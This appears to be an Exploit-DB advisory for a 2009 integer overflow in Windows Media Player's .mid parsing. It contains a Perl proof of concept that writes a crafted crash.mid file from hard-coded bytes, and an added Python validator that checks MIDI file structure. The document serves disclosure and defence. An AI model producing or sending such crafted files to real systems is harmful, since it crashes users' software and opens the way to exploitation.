Vendor: Windows Media Player
By: HuoFu
CVSS: 7.5 (HIGH)
CWE: 190 (Integer Overflow)
Product Name: Windows Media Player
Affected Version From: 11.0.5721.5260
Affected Version To: 11.0.5721.5260
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:windows_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Windows Media Player (.mid file) Integer Overflow PoC

This proof of concept targets Windows Media Player. It creates a malicious .mid file that, when opened in Windows Media Player, causes an integer overflow resulting in a crash. The file contains a header chunk with a length of 0x6, followed by a track chunk with a declared length of 0x4e. The track contains a malformed MIDI message, which causes the integer overflow.

Mitigation:

The user should avoid opening untrusted .mid files in Windows Media Player.
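
A structural pre-check that a file-intake or mail-filtering pipeline could run on .mid files before they reach a player, given here as an added example that is not part of the original advisory or PoC. It enforces general Standard MIDI File rules (header length 6, chunk lengths inside the file, delta times of at most 4 bytes, data bytes below 0x80) and is not a signature for this specific crash; the function names and sample bytes are constructed for illustration.

```python
import struct

DATA_LEN = {0x8: 2, 0x9: 2, 0xA: 2, 0xB: 2, 0xC: 1, 0xD: 1, 0xE: 2}  # data bytes per status nibble

def read_vlq(buf, pos):  # variable-length quantity: 7 bits per byte, at most 4 bytes
    value = 0
    for i in range(4):
        if pos + i >= len(buf):
            raise ValueError("truncated variable-length quantity")
        value = (value << 7) | (buf[pos + i] & 0x7F)
        if not buf[pos + i] & 0x80:
            return value, pos + i + 1
    raise ValueError("variable-length quantity longer than 4 bytes")

def check_track(trk):  # walk every event of one MTrk body; raise on the first bad one
    pos, status = 0, None
    while pos < len(trk):
        _, pos = read_vlq(trk, pos)                   # delta time
        if pos < len(trk) and trk[pos] & 0x80:        # explicit status byte
            status, pos = trk[pos], pos + 1
        if status in (0xF0, 0xF7, 0xFF):              # sysex / meta carry a length
            length, pos = read_vlq(trk, pos + (status == 0xFF))  # skip meta type
            if pos + length > len(trk):
                raise ValueError("event length runs past end of track")
            pos, status = pos + length, None          # cancels running status
            continue
        need = DATA_LEN.get((status or 0) >> 4)       # None: no usable status
        data = trk[pos:pos + (need or 0)]
        if need is None or len(data) < need or any(b & 0x80 for b in data):
            raise ValueError("malformed channel event at track offset %d" % pos)
        pos += need

def first_problem(blob):  # returns a description of the first problem, or None
    if len(blob) < 14 or blob[:8] != b"MThd\x00\x00\x00\x06":
        return "MThd header missing, truncated, or length is not 6"
    pos = 14
    try:
        while pos + 8 <= len(blob):
            tag, length = struct.unpack(">4sI", blob[pos:pos + 8])
            if pos + 8 + length > len(blob):
                return "chunk %r at offset %d overruns the file" % (tag, pos)
            if tag == b"MTrk":
                check_track(blob[pos + 8:pos + 8 + length])
            pos += 8 + length
    except ValueError as err:
        return "track chunk at offset %d: %s" % (pos, err)

# Constructed samples: a minimal valid file, and one whose second delta time is a 5-byte VLQ.
GOOD = b"MThd" + struct.pack(">IHHH", 6, 0, 1, 96) + b"MTrk\x00\x00\x00\x08\x00\x90\x3c\x40\x00\xff\x2f\x00"
BAD = GOOD[:14] + b"MTrk\x00\x00\x00\x10\x00\x90\x3c\x40\x81\x81\x81\x81\x01\x80\x3c\x40\x00\xff\x2f\x00"
```

Files for which `first_problem` returns a string can be quarantined or rejected instead of being handed to the player.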
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Windows Media Player (.mid file) Integer Overflow PoC
# By HuoFu
#
# Test Windows Media Player.  Ver: 11.0.5721.5260
#

open(Fin, ">crash.mid") || die "can't create crash sample.$!";

$data = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";

print Fin $data;

close(Fin);

# milw0rm.com [2009-04-15]